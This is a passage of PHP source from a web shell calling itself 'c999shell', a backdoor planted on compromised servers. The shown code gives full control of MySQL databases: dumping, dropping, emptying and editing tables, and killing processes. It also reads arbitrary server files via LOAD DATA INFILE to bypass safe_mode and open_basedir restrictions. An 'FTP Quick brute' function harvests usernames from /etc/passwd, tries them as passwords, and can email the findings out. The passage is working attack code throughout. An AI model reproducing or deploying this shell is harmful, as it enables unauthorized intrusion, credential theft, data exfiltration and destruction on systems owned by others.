  1084.      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
  1085.      echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
  1086.      $v = join (";",$dmptbls);
  1087.      echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
  1088.      if ($dump_file) {$tmp = $dump_file;}
  1089.      else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
  1090.      echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
  1091.      echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
  1092.      echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
  1093.      echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
  1094.      echo "</form>";
  1095.     }
  1096.     else
  1097.     {
  1098.      $diplay = TRUE;
  1099.      $set = array();
  1100.      $set["sock"] = $sql_sock;
  1101.      $set["db"] = $sql_db;
  1102.      $dump_out = "download";
  1103.      $set["print"] = 0;
  1104.      $set["nl2br"] = 0;
  1105.      $set[""] = 0;
  1106.      $set["file"] = $dump_file;
  1107.      $set["add_drop"] = TRUE;
  1108.      $set["onlytabs"] = array();
  1109.      if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
  1110.      $ret = mysql_dump($set);
  1111.      if ($sql_dump_download)
  1112.      {
  1113.       @ob_clean();
  1114.       header("Content-type: application/octet-stream");
  1115.       header("Content-length: ".strlen($ret));
  1116.       header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
  1117.       echo $ret;
  1118.       exit;
  1119.      }
  1120.      elseif ($sql_dump_savetofile)
  1121.      {
  1122.       $fp = fopen($sql_dump_file,"w");
  1123.       if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
  1124.       else
  1125.       {
  1126.        fwrite($fp,$ret);
  1127.        fclose($fp);
  1128.        echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
  1129.       }
  1130.      }
  1131.      else {echo "<b>Dump: nothing to do!</b>";}
  1132.     }
  1133.    }
  1134.    if ($diplay)
  1135.    {
  1136.     if (!empty($sql_tbl))
  1137.     {
  1138.      if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
  1139.      $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
  1140.      $count_row = mysql_fetch_array($count);
  1141.      mysql_free_result($count);
  1142.      $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
  1143.      $tbl_struct_fields = array();
  1144.      while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
  1145.      if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
  1146.      if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
  1147.      if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
  1148.      if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
  1149.      $perpage = $sql_tbl_le - $sql_tbl_ls;
  1150.      if (!is_numeric($perpage)) {$perpage = 10;}
  1151.      $numpages = $count_row[0]/$perpage;
  1152.      $e = explode(" ",$sql_order);
  1153.      if (count($e) == 2)
  1154.      {
  1155.       if ($e[0] == "d") {$asc_desc = "DESC";}
  1156.       else {$asc_desc = "ASC";}
  1157.       $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
  1158.      }
  1159.      else {$v = "";}
  1160.      $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
  1161.      $result = mysql_query($query) or print(mysql_smarterror());
  1162.      echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
  1163.      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1164.      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1165.      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1166.      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1167.      if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
  1168.      if ($sql_tbl_act == "insert")
  1169.      {
  1170.       if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
  1171.       if (!empty($sql_tbl_insert_radio))
  1172.       {
  1173.  
  1174.       }
  1175.       else
  1176.       {
  1177.        echo "<br><br><b>Inserting row into table:</b><br>";
  1178.        if (!empty($sql_tbl_insert_q))
  1179.        {
  1180.         $sql_query = "SELECT * FROM `".$sql_tbl."`";
  1181.         $sql_query .= " WHERE".$sql_tbl_insert_q;
  1182.         $sql_query .= " LIMIT 1;";
  1183.         $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
  1184.         $values = mysql_fetch_assoc($result);
  1185.         mysql_free_result($result);
  1186.        }
  1187.        else {$values = array();}
  1188.        echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
  1189.        foreach ($tbl_struct_fields as $field)
  1190.        {
  1191.         $name = $field["Field"];
  1192.         if (empty($sql_tbl_insert_q)) {$v = "";}
  1193.         echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
  1194.         $i++;
  1195.        }
  1196.        echo "</table><br>";
  1197.        echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
  1198.        if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
  1199.        echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
  1200.       }
  1201.      }
  1202.      if ($sql_tbl_act == "browse")
  1203.      {
  1204.       $sql_tbl_ls = abs($sql_tbl_ls);
  1205.       $sql_tbl_le = abs($sql_tbl_le);
  1206.       echo "<hr size=\"1\" noshade>";
  1207.       echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
  1208.       $b = 0;
  1209.       for($i=0;$i<$numpages;$i++)
  1210.       {
  1211.        if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
  1212.        echo $i;
  1213.        if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
  1214.        if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
  1215.        else {echo "&nbsp;";}
  1216.       }
  1217.       if ($i == 0) {echo "empty";}
  1218.       echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
  1219.       echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
  1220.       echo "<tr>";
  1221.       echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
  1222.       for ($i=0;$i<mysql_num_fields($result);$i++)
  1223.       {
  1224.        $v = mysql_field_name($result,$i);
  1225.        if ($e[0] == "a") {$s = "d"; $m = "asc";}
  1226.        else {$s = "a"; $m = "desc";}
  1227.        echo "<td>";
  1228.        if (empty($e[0])) {$e[0] = "a";}
  1229.        if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
  1230.        else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
  1231.        echo "</td>";
  1232.       }
  1233.       echo "<td><font color=\"green\"><b>Action</b></font></td>";
  1234.       echo "</tr>";
  1235.       while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1236.       {
  1237.        echo "<tr>";
  1238.        $w = "";
  1239.        $i = 0;
  1240.        foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
  1241.        if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
  1242.        echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
  1243.        $i = 0;
  1244.        foreach ($row as $k=>$v)
  1245.        {
  1246.         $v = htmlspecialchars($v);
  1247.         if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
  1248.         echo "<td>".$v."</td>";
  1249.         $i++;
  1250.        }
  1251.        echo "<td>";
  1252.        echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
  1253.        echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
  1254.        echo "</td>";
  1255.        echo "</tr>";
  1256.       }
  1257.       mysql_free_result($result);
  1258.       echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
  1259.       echo "<option value=\"\">With selected:</option>";
  1260.       echo "<option value=\"deleterow\">Delete</option>";
  1261.       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1262.      }
  1263.     }
  1264.     else
  1265.     {
  1266.      $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
  1267.      if (!$result) {echo mysql_smarterror();}
  1268.      else
  1269.      {
  1270.       echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
  1271.      
  1272.       $i = 0;
  1273.       $tsize = $trows = 0;
  1274.       while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1275.       {
  1276.        $tsize += $row["Data_length"];
  1277.        $trows += $row["Rows"];
  1278.        $size = view_size($row["Data_length"]);
  1279.        echo "<tr>";
  1280.        echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
  1281.        echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
  1282.        echo "<td>".$row["Rows"]."</td>";
  1283.        echo "<td>".$row["Type"]."</td>";
  1284.        echo "<td>".$row["Create_time"]."</td>";
  1285.        echo "<td>".$row["Update_time"]."</td>";
  1286.        echo "<td>".$size."</td>";
  1287.        echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
  1288.        echo "</tr>";
  1289.        $i++;
  1290.       }
  1291.       echo "<tr bgcolor=\"000000\">";
  1292.       echo "<td><center><b>»</b></center></td>";
  1293.       echo "<td><center><b>".$i." table(s)</b></center></td>";
  1294.       echo "<td><b>".$trows."</b></td>";
  1295.       echo "<td>".$row[1]."</td>";
  1296.       echo "<td>".$row[10]."</td>";
  1297.       echo "<td>".$row[11]."</td>";
  1298.       echo "<td><b>".view_size($tsize)."</b></td>";
  1299.       echo "<td></td>";
  1300.       echo "</tr>";
  1301.       echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
  1302.       echo "<option value=\"\">With selected:</option>";
  1303.       echo "<option value=\"tbldrop\">Drop</option>";
  1304.       echo "<option value=\"tblempty\">Empty</option>";
  1305.       echo "<option value=\"tbldump\">Dump</option>";
  1306.       echo "<option value=\"tblcheck\">Check table</option>";
  1307.       echo "<option value=\"tbloptimize\">Optimize table</option>";
  1308.       echo "<option value=\"tblrepair\">Repair table</option>";
  1309.       echo "<option value=\"tblanalyze\">Analyze table</option>";
  1310.       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1311.       mysql_free_result($result);
  1312.      }
  1313.     }
  1314.    }
  1315.    }
  1316.   }
  1317.   else
  1318.   {
  1319.    $acts = array("","newdb","serverstatus","servervars","processes","getfile");
  1320.    if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
  1321.    if (!empty($sql_act))
  1322.    {
  1323.     echo "<hr size=\"1\" noshade>";
  1324.     if ($sql_act == "newdb")
  1325.     {
  1326.      echo "<b>";
  1327.      if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
  1328.      else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1329.     }
  1330.     if ($sql_act == "serverstatus")
  1331.     {
  1332.      $result = mysql_query("SHOW STATUS", $sql_sock);
  1333.      echo "<center><b>Server-status variables:</b><br><br>";
  1334.      echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1335.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1336.      echo "</table></center>";
  1337.      mysql_free_result($result);
  1338.     }
  1339.     if ($sql_act == "servervars")
  1340.     {
  1341.      $result = mysql_query("SHOW VARIABLES", $sql_sock);
  1342.      echo "<center><b>Server variables:</b><br><br>";
  1343.      echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1344.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1345.      echo "</table>";
  1346.      mysql_free_result($result);
  1347.     }
  1348.     if ($sql_act == "processes")
  1349.     {
  1350.      if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
  1351.      $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
  1352.      echo "<center><b>Processes:</b><br><br>";
  1353.      echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
  1354.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
  1355.      echo "</table>";
  1356.      mysql_free_result($result);
  1357.     }
  1358.     if ($sql_act == "getfile")
  1359.     {
  1360.      $tmpdb = $sql_login."_tmpdb";
  1361.      $select = mysql_select_db($tmpdb);
  1362.      if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
  1363.      if ($select)
  1364.      {
  1365.       $created = FALSE;
  1366.       mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
  1367.       mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
  1368.       $result = mysql_query("SELECT * FROM tmp_file;");
  1369.       if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
  1370.       else
  1371.       {
  1372.        for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
  1373.        $f = "";
  1374.        while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
  1375.        if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
  1376.        else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
  1377.        mysql_free_result($result);
  1378.        mysql_query("DROP TABLE tmp_file;");
  1379.       }
  1380.      }
  1381.      mysql_drop_db($tmpdb); //comment it if you want to leave database
  1382.     }
  1383.    }
  1384.   }
  1385.  }
  1386.  echo "</td></tr></table>";
  1387.  if ($sql_sock)
  1388.  {
  1389.   $affected = @mysql_affected_rows($sql_sock);
  1390.   if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
  1391.   echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
  1392.  }
  1393.  echo "</table>";
  1394. }
  1395. if ($act == "mkdir")
  1396. {
  1397.  if ($mkdir != $d)
  1398.  {
  1399.   if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
  1400.   elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
  1401.   echo "<br><br>";
  1402.  }
  1403.  $act = $dspact = "ls";
  1404. }
  1405. if ($act == "ftpquickbrute")
  1406. {
  1407.  echo "<b>Ftp Quick brute:</b><br>";
  1408.  if (!win) {echo "This functions not work in Windows!<br><br>";}
  1409.  else
  1410.  {
  1411.   function c999ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
  1412.   {
  1413.    if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
  1414.    else {$TRUE = TRUE;}
  1415.    if ($TRUE)
  1416.    {
  1417.     $sock = @ftp_connect($host,$port,$timeout);
  1418.     if (@ftp_login($sock,$login,$pass))
  1419.     {
  1420.      echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
  1421.      ob_flush();
  1422.      return TRUE;
  1423.     }
  1424.    }
  1425.   }
  1426.   if (!empty($submit))
  1427.   {
  1428.    if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
  1429.    $fp = fopen("/etc/passwd","r");
  1430.    if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
  1431.    else
  1432.    {
  1433.     if ($fqb_logging)
  1434.     {
  1435.      if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
  1436.      else {$fqb_logfp = FALSE;}
  1437.      $fqb_log = "FTP Quick Brute (called c999shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
  1438.      if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1439.     }
  1440.     ob_flush();
  1441.     $i = $success = 0;
  1442.     $ftpquick_st = getmicrotime();
  1443.     while(!feof($fp))
  1444.     {
  1445.      $str = explode(":",fgets($fp,2048));
  1446.      if (c999ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
  1447.      {
  1448.       echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
  1449.       $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
  1450.       if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1451.       $success++;
  1452.       ob_flush();
  1453.      }
  1454.      if ($i > $fqb_lenght) {break;}
  1455.      $i++;
  1456.     }
  1457.     if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
  1458.     $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
  1459.     echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
  1460.     $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
  1461.     if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
  1462.     if ($fqb_logemail) {@mail($fqb_logemail,"c999shell v. ".$shver." report",$fqb_log);}
  1463.     fclose($fqb_logfp);
  1464.    }
  1465.   }
  1466.   else
  1467.   {
  1468.    $logfile = $tmpdir_logs."c999sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
  1469.    $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
  1470.    echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
  1471.   }
  1472.  }
  1473. }
  1474. if ($act == "d")
  1475. {
  1476.  if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
  1477.  else
  1478.  {
  1479.   echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
  1480.   if (!$win)
  1481.   {
  1482.    echo "<tr><td><b>Owner/Group</b></td><td> ";
  1483.    $ow = posix_getpwuid(fileowner($d));
  1484.    $gr = posix_getgrgid(filegroup($d));
  1485.    $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  1486.   }
  1487.   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
  1488.  }
  1489. }
  1490. if ($act == "phpinfo") {@ob_clean(); phpinfo(); c999shexit();}
  1491. if ($act == "security")
  1492. {
  1493.  echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
  1494.  if (!$win)
  1495.  {
  1496.   if ($nixpasswd)
  1497.   {
  1498.    if ($nixpasswd == 1) {$nixpasswd = 0;}
